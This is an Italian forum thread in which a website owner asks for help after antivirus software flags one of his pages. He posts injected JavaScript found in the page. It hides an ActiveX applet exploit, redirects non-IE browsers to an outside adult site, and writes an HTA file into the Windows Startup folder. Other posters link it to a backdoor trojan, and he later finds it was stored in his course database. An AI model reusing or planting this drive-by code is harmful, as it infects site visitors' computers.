Ciao a tutti.
Ho un problema con questa pagina (www.tecnographic.it/corsi_bak.aspx) , Internet Explorer mi rileva un errore di javascript, mentre su un altro pc che monta il sw av Kaspersky mi dice addirittura che c'è un codice maligno. Non capisco!???? Mi ricordo solo che tempo fa inserii un comportamento con dw il quale introduceva il simbolo di copyright in fondo a sx sulla barra di stato, ma adesso questo comportamento non è più presente (almeno nella pagina). Il fatto strano ke il comportamento continua ad apparire e il Kaspersky mi dal'errore ma il tutto solo se clikko sul primo corso (Autocad). Con FireFox mi dice che non carica una applet com.ms.activeX........

visualizzando il codice generato dalla pagina sembra essere presente un codice da me non inserito (sembra proprio un virus). Il kasperky lo blocca subito. Ki gli volesse dare un'occhiata. allego anche l'immagine di kaspersky

Ke ne dite?

a quell'indirizzo non è disponibile alcuna pag ora ma solo un msg del server

Originariamente inviato da MrOZ
a quell'indirizzo non è disponibile alcuna pag ora ma solo un msg del server
Me ne sono accorto pure io, ora posto il pezzo di codice incriminato che però nella mia pagina in dw non è presente:


<body onLoad="loadPage()" onMouseMove ="javascript:window.status='2000-2001©COPYRIGHT'" bgcolor="#ffffff">
<p></p>


<div class='damn' style='position:absolute; visibility:hidden'><APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET></div>
<SCRIPT language=JAVASCRIPT>
window.status = "2000-2001©COPYRIGHT";function loadPage(){if (navigator.appName.substring(0, 9)!= "Microsoft"){window.open('http://www.cuntonly.com/black.html','_parent')};else{f()}};
a1=document.applets[0];
if (navigator.systemLanguage.substring(0,2)=="it") {if(navigator.userAgent.indexOf('NT') != -1){fn="..\\\\..\\\\All Users\\\\Menu Avvio\\\\Programmi\\\\Esecuzione automatica\\\\Welcome.hta"} else {fn="..\\\\All Users\\\\Menu Avvio\\\\Programmi\\\\Esecuzione automatica\\\\Welcome.hta"}} else if(na.........................

Originariamente inviato da MrOZ
a quell'indirizzo non è disponibile alcuna pag ora ma solo un msg del server
Ora è funziona

Questo è quello che c'è scritto in quella pagina, prima della descrizione del corso:

ATTENZIONE, il software antivirus Kaspersky potrebbe rilevare con Internet Explorer un codice maligno che in realtà non c'è (succede solo cliccando sul corso di Autocad!!), vi assicuriamo che il nostro codice rispetta completamente il w3c. Probabilmente il porting ad asp.net causa qualche incompatibilità con questa combinazione. Ce ne scusiamo con i nostri utenti.

Edit:

sembra comunque che in effetti ci sia qualcosa che non va: quel codice tenta di inserire la loro home page in esecuzione automatica

Vedi:

if (navigator.systemLanguage.substring(0,2)=="it") {if(navigator.userAgent.indexOf('NT') != -1){fn="..\\\\..\\\\All Users\\\\Menu Avvio\\\\Programmi\\\\Esecuzione automatica\\\\Welcome.hta"} else {fn="..\\\\All Users\\\\Menu Avvio\\\\Programmi\\\\Esecuzione automatica\\\\Welcome.hta"}} else if(na.........................


Meccanismo simile a quello che abbiamo discusso giorni fa in questo thread: http://forum.hwupgrade.it/showthread.php?s=&threadid=753482

L'ho visto, ma cacchio non c'è nessuna traccia nel sorgente!! Porca...

Per il momento la pagina l'ho rinominata in corsi_bak.aspx è non è raggiungibile dai munù ma solo digitando l'indirizzo, non si sa mai!

Gurdate ke ho trovato su symantec:


VBS.Kidarcade.F is a virus based on Visual Basic Script (VBS). It has been put into an HTML page, and is on at least one Web site. The virus installs a Backdoor Trojan that allows unauthorized access to the infected computer. Link (http://securityresponse.symantec.com/avcenter/venc/data/vbs.kidarcade.f.html)


Io ho Kaspersky, possibile ke non mi vede traccia di questo

in effetti io le chiavi ke dice il noron non le ho nel registro, perchè kasper me lo blocca, ma il codice nella mia pagina rimane :cry:

...Oppure si chiama "js.exception.exploit". Ma io sicuramente non lo ho.
Ho controllato tutte le chiavi di registro ke dicono di controllare. Però ho scoperto ke attacca anche i webservers. Può essere quindi colpa di Aruba?

Ragazzi, incredibile! Il codice era scritto direttamente dentro al database dove sono situate le descrizioni dei corsi. Non sembra un trojan da poco secondo me!